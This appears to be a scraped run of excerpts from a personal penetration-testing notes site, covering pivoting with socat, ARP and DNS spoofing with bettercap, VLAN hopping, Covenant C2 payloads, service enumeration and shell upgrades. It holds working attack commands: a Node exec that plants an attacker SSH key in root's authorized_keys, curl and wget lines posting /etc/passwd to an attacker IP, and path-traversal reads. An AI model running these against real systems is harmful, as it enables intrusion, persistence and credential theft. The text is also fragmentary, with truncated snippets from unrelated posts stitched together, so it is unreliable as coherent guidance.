Socat If Socat is not on the target system, upload a static binary. This will listen to port 5555 and forward it to the given IP on the given port deeper in the target’s network: socat -ddd TCP-LISTEN:5555,reuseaddr,fork TCP:10.4.247.215:5432 Proxychains ! If proxychains is slow, especially while port scanning, try to reduce the following parameters:…
This is an overview blog post. MitM Ettercap Bettercap L2 Scapy L2 mitmdump L3 Loki Various VLAN attacks NAC Network admission control Other tools and notes: Use http_hijack.py in the P151 script directory) to quickly set up a MitM. Check if you can See OSPF packets. Inspect then in Wireshark for the Auth Type field. If this is…
Network packet manipulation shell and library for Python. (Github)
A Ettercap successor, written in Go. Basic commands: Passive ARP probing: net.recon on net.recon off Active probing: net.probe on net.probe off Sniffing: set net.sniff.output /tmp/sniff.pcap // optional net.sniff on net.sniff off Spoofing: set arp.spoof.targets $target1, $target2, $target3 arp.spoof on arp.spoof off DNS Spoofing: set dns.spoof.domains target.domain // the domain which should be resolved as… set…
Definitions: A trunk connection is a connection between two switches. Tools Yersinia is a layer 2 modification framework. VoIPHopper is a simple tool which can sniff VoIP traffic and output the VLAN ID from the VoIP network:voiphopper -c 0 -i eth0 Enumerate existing VLANs Start Yersiniayersinia -I Press g Select DTP Press 5 to see…
Caution: Don’t change the MAC address via a remote session because of reasons… Linux ifconfig eth0 ether 00:01:02:03:04:05 Mac ifconfig en0 ether 00:01:02:03:04:05 Windows macshift e.g.
Techniques which decides if a new device can join the normal or a special network. A captive portal forces a client to an authentication page. After authentication in a normal low-security environment (where you cannot assume preconfigured systems) the authentication is usually granted to a combination of MAC and IP. Therefore, try to sniff valid…
-NET attack framework: https://github.com/cobbr/Covenant Usage Create a listener on the attack system. Add a launcher to the listener. The attack system now provides a payload file the victim has to start. You can use UrbanBishop to inject the payload into a running process. As soon as the payload is executed, Covenant will show on the dashboard…
Execute command: const { exec } = require("child_process"); exec(“echo ‘ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHGb9AwdEdyFm6SBuQeCWyKMh+CRXlMMb4l1GKlB8rnWoIzVClRfeWZnYzkBG487Mhb3svrd/ouVpXKWsFiAFSl5OJie88WJGTWc+3sU3I/TvuTbDgrqWwUMpPZj0jYgq99iaQeJDNPjKTs3w0QEq7GT1q69DU3m1jDCggdHYzMMA8byVXpCUivN1o4tkABhqSeUeZgW2Q9n2NxKkHGNvbkAoutFho1g8azgvnHI9HOExd81ppdzuAVC/YOTRtUKIB3ZNnfYS1qE7xp4fn7a/BEA+N8Axl0aaXLVLi2/RI+nwotdDb/vDXotS2X6B781xE9JboCRvJzejACszlMcI3bPq+R6UY3XILHDl3jpY70IFrpmX/aeUZ4d8m6A79EwyaQuckyU5eTVx7BH/RwH7hmtd7DR6VcxqNzteI49Yq8HwpyBU62I2AmnMuEXEvcPQLiM4947I3pxyZkYtZ5kULcXuWTMOITvPrFNuzwwPW1x3NbR+EnSbLtk8Ybr5iDyM= root@imac2019-kali’ > /root/.ssh/authorized_keys”, (error, stdout, stderr) => { if (error) { console.log(‘error: ${error.message}‘); return; } if (stderr) { console.log(‘stderr: ${stderr}‘); return; } console.log(‘stdout: ${stdout}‘);});
Write into a file: curl $url -o /tmp/f.txtcurl $url --output /tmp/f.txtcurl $url > /tmp/f.txt Post a local file: curl -X POST --data-binary @/etc/passwd http://192.168.49.53:21/ Execute command and return the result: curl -d q=`id` http://localhost:21/ With a header curl --header "Host: localhost" 10.10.10.10 Use the correct path also with ../ (usefull for file traversion attacks): curl --path-as-is $target:$port/public/../../../etc/passwd
A Message broker, written in Erlang. Uses the Erlang Cowboy webserver. Notes Default credentials: guest / guest (works per defalt only from localhost) Username can be changed without the old password on the command line?!rabbitmqctl change_password username newpassword Files with suffix .DCD contain credentials. If you have the Erlang cookie:erl -cookie JPCGJCAEWHPKKPBXBYYB -name rabbit -sname…
Erlang Port Mapper Daemon Enumeration Mandatory Check if epmd is runningecho -n -e "\x00\x01\x6e" | nc -vn $target 4369 Check with nmapnmap -sV -Pn -n -T4 -p 4369 --script epmd-info $target Brute force the key with https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ and try the RCE.
Listing of all files from a Xampp for Windows 7.4.6 installation. Look into phpinfo page — could reveals usernames.
Post files wget --post-file=/etc/passwd http://$attacker_ip/ Set output file: wget -O /tmp/s http://...
Use https://jwt.io/ to decode JWT It also shows the various parts. A JWT token has multiple parts in base64, separated by a point character. Create JWT token Create PEM SSH key: openssl genrsa -out private.pem 2048 Create base64 from header and payload: $ echo -n '{"typ":"JWT","alg":"RS256","kid":"http://10.10.14.17/private.pem"}' | base64 -w0 | sed s/+/-/ | sed -E s/=+$// =>…
Example of a connection: openssl s_client -connect $target:995 -crlf -quiet Issues The following message means that the server and client could not agree on a shared crypto system; probably because the server’s crypto is too old. 139763095926080:error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol:../ssl/statem/statem_lib.c:1957: Add TLS 1 support: openssl s_client -connect $target:995 -crlf -quiet -tls1
Enumeration Mandatory Try to connect: Start the console:/opt/mysql-shell-8.0.23-linux-glibc2.12-x86-64bit/bin# ./mysqlsh Try to connect with default credentials or found ones:MySQL JS > var test_conn = require('mysqlx');MySQL JS > var session = mysqlx.getSession({host: '192.168.156.58', user: 'root', password: 'root', port: 33060});
Enumeration Mandatory Check CVE-2020–11651 Note that execution of scheduled tasks can take 5–10 minutes.
Enumeration Try to just login. Per default, no user is required.mongodb $target Enumerate with NSE scriptsnmap -sV --script "mongo* and default" -p 27017 $target Try to connectmongo 'mongodb://nodebb:nodebb@192.168.91.69:27017/nodebb' Optional Try https://github.com/codingo/NoSQLMap
Enumeration Code execution I am stuck
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';